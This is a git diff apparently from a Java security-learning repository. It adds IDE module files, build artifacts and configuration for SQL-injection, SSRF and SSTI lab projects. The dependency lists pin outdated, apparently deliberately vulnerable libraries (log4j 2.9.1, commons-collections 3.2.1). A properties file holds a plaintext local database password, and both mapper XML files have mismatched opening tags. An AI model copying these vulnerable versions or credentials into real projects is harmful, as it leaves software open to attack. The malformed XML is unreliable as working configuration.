+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar
new file mode 100644
index 00000000..c7a8d51a
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar.original b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar.original
new file mode 100644
index 00000000..7daf29a5
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/MybatisPluSqli-0.0.1-SNAPSHOT.jar.original differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/application.properties b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/application.properties
new file mode 100644
index 00000000..d427ff5d
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/application.properties
@@ -0,0 +1,6 @@
+server.port=8081
+spring.datasource.url=jdbc:mysql://localhost:3306/mp_test?AllowPublicKeyRetrieval=true&useSSL=false&serverTimezone=UTC
+spring.datasource.username=Drunkbaby
+spring.datasource.password=123123
+spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
+mybatis-plus.mapper-locations=classpath:mapper/*.xml
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/MybatisPluSqliApplication.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/MybatisPluSqliApplication.class
new file mode 100644
index 00000000..5f4e93ce
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/MybatisPluSqliApplication.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/config/MybatisPlusConfig.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/config/MybatisPlusConfig.class
new file mode 100644
index 00000000..15cac94a
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/config/MybatisPlusConfig.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLI.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLI.class
new file mode 100644
index 00000000..39aec72d
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLI.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLIDefense.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLIDefense.class
new file mode 100644
index 00000000..5e29b532
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/controller/SQLIDefense.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/EmployeeMapper.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/EmployeeMapper.class
new file mode 100644
index 00000000..b0c346b7
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/EmployeeMapper.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/PersonMapper.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/PersonMapper.class
new file mode 100644
index 00000000..55da1757
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/mapper/PersonMapper.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Employee.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Employee.class
new file mode 100644
index 00000000..e55f4a31
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Employee.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Person.class b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Person.class
new file mode 100644
index 00000000..470ebe75
Binary files /dev/null and b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/com/drunkbaby/pojo/Person.class differ
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/EmployeeMapper.xml b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/EmployeeMapper.xml
new file mode 100644
index 00000000..ddb04d4b
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/EmployeeMapper.xml
@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!doctype mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
+
+<ul class="image_map">
+
+ <resultmap type="com.drunkbaby.pojo.Employee" id="Employee">
+ <id column="id" property="id" javaType="java.lang.Integer" jdbcType="NUMERIC"/>
+ <id column="name" property="username" javaType="java.lang.String" jdbcType="VARCHAR"/>
+ <id column="work" property="password" javaType="java.lang.String" jdbcType="VARCHAR"/>
+ </resultmap>
+
+</mapper>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/PersonMapper.xml b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/PersonMapper.xml
new file mode 100644
index 00000000..f8d72c13
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/classes/mapper/PersonMapper.xml
@@ -0,0 +1,11 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!doctype mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
+
+<ul class="image_map">
+
+ <resultmap type="com.drunkbaby.pojo.Person" id="Person">
+ <id column="id" property="id" javaType="java.lang.Integer" jdbcType="NUMERIC"/>
+ <id column="name" property="username" javaType="java.lang.String" jdbcType="VARCHAR"/>
+ </resultmap>
+
+</mapper>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-archiver/pom.properties b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-archiver/pom.properties
new file mode 100644
index 00000000..19a3912c
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-archiver/pom.properties
@@ -0,0 +1,3 @@
+artifactId=MybatisPluSqli
+groupId=com.drunkbaby
+version=0.0.1-SNAPSHOT
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
new file mode 100644
index 00000000..9576c716
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/createdFiles.lst
@@ -0,0 +1,8 @@
+com\drunkbaby\controller\SQLI.class
+com\drunkbaby\MybatisPluSqliApplication.class
+com\drunkbaby\controller\SQLIDefense.class
+com\drunkbaby\config\MybatisPlusConfig.class
+com\drunkbaby\mapper\EmployeeMapper.class
+com\drunkbaby\pojo\Person.class
+com\drunkbaby\pojo\Employee.class
+com\drunkbaby\mapper\PersonMapper.class
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
new file mode 100644
index 00000000..773ec3c1
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/MybatisPluSqli/target/maven-status/maven-compiler-plugin/compile/default-compile/inputFiles.lst
@@ -0,0 +1,8 @@
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\controller\SQLI.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\pojo\Person.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\config\MybatisPlusConfig.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\mapper\EmployeeMapper.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\controller\SQLIDefense.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\pojo\Employee.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\mapper\PersonMapper.java
+G:\OneDrive - yapuu\Java��ȫѧκ\JavaSecurityLearning\JavaSecurity\CodeReview\JavaSec-Code\MybatisPluSqli\src\main\java\com\drunkbaby\MybatisPluSqliApplication.java
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SSRF/SSRF.iml b/JavaSecurity/CodeReview/JavaSec-Code/SSRF/SSRF.iml
new file mode 100644
index 00000000..a20ff9bc
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SSRF/SSRF.iml
@@ -0,0 +1,109 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.5.12" level="project" />
+ <orderentry type="library" name="Maven: commons-logging:commons-logging:1.2" level="project" />
+ <orderentry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
+ <orderentry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
+ <orderentry type="library" name="Maven: commons-net:commons-net:3.6" level="project" />
+ <orderentry type="library" name="Maven: org.jsoup:jsoup:1.10.2" level="project" />
+ <orderentry type="library" name="Maven: org.apache.httpcomponents:httpasyncclient:4.1.4" level="project" />
+ <orderentry type="library" name="Maven: org.apache.httpcomponents:httpcore:4.4.15" level="project" />
+ <orderentry type="library" name="Maven: org.apache.httpcomponents:httpcore-nio:4.4.15" level="project" />
+ <orderentry type="library" name="Maven: org.apache.httpcomponents:httpclient:4.5.12" level="project" />
+ <orderentry type="library" name="Maven: commons-codec:commons-codec:1.15" level="project" />
+ <orderentry type="library" name="Maven: com.google.guava:guava:23.0" level="project" />
+ <orderentry type="library" name="Maven: com.google.code.findbugs:jsr305:1.3.9" level="project" />
+ <orderentry type="library" name="Maven: com.google.errorprone:error_prone_annotations:2.0.18" level="project" />
+ <orderentry type="library" name="Maven: com.google.j2objc:j2objc-annotations:1.1" level="project" />
+ <orderentry type="library" name="Maven: org.codehaus.mojo:animal-sniffer-annotations:1.14" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.11" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.17.2" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.36" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" name="Maven: org.yaml:snakeyaml:1.30" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.13.3" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.7.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.65" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.projectlombok:lombok:1.18.24" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-starter-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework.boot:spring-boot-test-autoconfigure:2.7.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.jayway.jsonpath:json-path:2.7.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:json-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.minidev:accessors-smart:2.4.8" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.ow2.asm:asm:9.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:slf4j-api:1.7.36" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.xml.bind:jakarta.xml.bind-api:2.3.3" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: jakarta.activation:jakarta.activation-api:1.2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.assertj:assertj-core:3.22.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.hamcrest:hamcrest:2.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-api:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.opentest4j:opentest4j:1.2.0" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-commons:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.apiguardian:apiguardian-api:1.1.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-params:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.jupiter:junit-jupiter-engine:5.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.junit.platform:junit-platform-engine:1.8.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-core:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: net.bytebuddy:byte-buddy-agent:1.12.13" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.objenesis:objenesis:3.2" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.mockito:mockito-junit-jupiter:4.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.skyscreamer:jsonassert:1.5.1" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: com.vaadin.external.google:android-json:0.0.20131108.vaadin1" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-core:5.3.22" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-jcl:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.springframework:spring-test:5.3.22" level="project" />
+ <orderentry type="library" scope="TEST" name="Maven: org.xmlunit:xmlunit-core:2.9.0" level="project" />
+ <orderentry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
+ <orderentry type="library" name="Maven: commons-collections:commons-collections:3.2.1" level="project" />
+ </component>
+</module>
\ No newline at end of file
diff --git a/JavaSecurity/CodeReview/JavaSec-Code/SSTI/SSTI.iml b/JavaSecurity/CodeReview/JavaSec-Code/SSTI/SSTI.iml
new file mode 100644
index 00000000..ca8ba1ea
--- /dev/null
+++ b/JavaSecurity/CodeReview/JavaSec-Code/SSTI/SSTI.iml
@@ -0,0 +1,116 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<module org.jetbrains.idea.maven.project.MavenProjectsManager.isMavenModule="true" type="JAVA_MODULE" version="4">
+ <component name="FacetManager">
+ <facet type="web" name="Web">
+ <configuration>
+ <webroots />
+ <sourceroots>
+ <root url="file://$MODULE_DIR$/src/main/java" />
+ <root url="file://$MODULE_DIR$/src/main/resources" />
+ </sourceroots>
+ </configuration>
+ </facet>
+ <facet type="Spring" name="Spring">
+ <configuration />
+ </facet>
+ </component>
+ <component name="NewModuleRootManager" LANGUAGE_LEVEL="JDK_1_8">
+ <output url="file://$MODULE_DIR$/target/classes" />
+ <output-test url="file://$MODULE_DIR$/target/test-classes" />
+ <content url="file://$MODULE_DIR$">
+ <sourcefolder url="file://$MODULE_DIR$/src/main/java" isTestSource="false" />
+ <sourcefolder url="file://$MODULE_DIR$/src/main/resources" type="java-resource" />
+ <sourcefolder url="file://$MODULE_DIR$/src/test/java" isTestSource="true" />
+ <excludefolder url="file://$MODULE_DIR$/target" />
+ </content>
+ <orderentry type="jdk" jdkName="1.8" jdkType="JavaSDK" />
+ <orderentry type="sourceFolder" forTests="false" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-autoconfigure:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-logging:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-classic:1.2.3" level="project" />
+ <orderentry type="library" name="Maven: ch.qos.logback:logback-core:1.2.3" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-to-slf4j:2.12.1" level="project" />
+ <orderentry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.12.1" level="project" />
+ <orderentry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.28" level="project" />
+ <orderentry type="library" name="Maven: jakarta.annotation:jakarta.annotation-api:1.3.5" level="project" />
+ <orderentry type="library" scope="RUNTIME" name="Maven: org.yaml:snakeyaml:1.25" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-json:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-databind:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-annotations:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.core:jackson-core:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jdk8:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.datatype:jackson-datatype-jsr310:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml.jackson.module:jackson-module-parameter-names:2.10.0" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:9.0.27" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:9.0.27" level="project" />
+ <orderentry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:9.0.27" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-validation:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: jakarta.validation:jakarta.validation-api:2.0.1" level="project" />
+ <orderentry type="library" name="Maven: org.hibernate.validator:hibernate-validator:6.0.17.Final" level="project" />
+ <orderentry type="library" name="Maven: org.jboss.logging:jboss-logging:3.4.1.Final" level="project" />
+ <orderentry type="library" name="Maven: com.fasterxml:classmate:1.5.0" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-web:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-beans:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-webmvc:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-aop:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-context:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework:spring-expression:5.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.springframework.boot:spring-boot-starter-thymeleaf:2.2.0.RELEASE" level="project" />
+ <orderentry type="library" name="Maven: org.thymeleaf:thymeleaf-spring5:3.0.11.RELEASE" level="project" />
